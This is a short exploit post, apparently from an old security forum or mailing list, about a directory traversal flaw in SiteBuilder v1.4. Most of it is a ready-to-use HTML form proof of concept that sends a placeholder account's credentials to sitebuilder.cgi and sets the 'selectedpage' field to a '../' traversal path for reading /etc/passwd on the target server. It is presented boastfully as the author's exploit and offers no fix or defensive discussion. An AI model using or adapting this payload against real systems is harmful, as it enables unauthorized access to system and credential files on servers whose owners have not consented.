Directory Traversal in SITEBUILDER - v1.4

With this Code you can view the /etc/passwd

You need a Account.

###################################################################

<html><body><p><center>

<b>Mein 31337 Exploit :-P</b><br>

<form action="http://targethost.com/cgi-bin/sbcgi/sitebuilder.cgi"

method=POST>

<input type="hidden" name="username" value="targetuser">

<input type="hidden" name="password" value="targetpassword">

<input type="hidden" name="selectedpage"

value="../../../../../../../../../../etc/passwd">

<p><input type="submit" name="action" value="Yes - Use Advanced Editor">

<p><input type="submit" value="Return to Site Builder">

</form>

</center></body></html>

###################################################################

Zero X member of www.lobnan.de and www.lostkey.org

[ reply ]